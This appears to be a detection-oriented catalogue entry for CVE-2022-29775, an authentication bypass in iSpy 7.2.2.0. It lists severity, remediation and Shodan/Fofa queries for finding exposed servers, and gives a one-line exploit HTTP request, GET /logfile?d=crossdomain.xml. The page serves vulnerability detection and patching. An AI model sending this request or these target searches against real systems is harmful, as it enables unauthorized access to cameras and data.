🔙 목록으로 돌아가기

CVE-2022-29775: iSpy 7.2.2.0 - Authentication Bypass

TitleiSpy 7.2.2.0 - Authentication Bypass
Authorarafatansari
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
RemediationUpgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.5275
CVE IDCVE-2022-29775
CWE IDCWE-287
Shodan Queryhttp.html:"iSpy is running"http.html:"ispy is running"
Fofa Querybody="ispy is running"
Tags cve cve2022 ispy auth-bypass ispyconnect vuln

🔍 Vulnerability Description

iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /logfile?d=crossdomain.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29775.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-29775.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A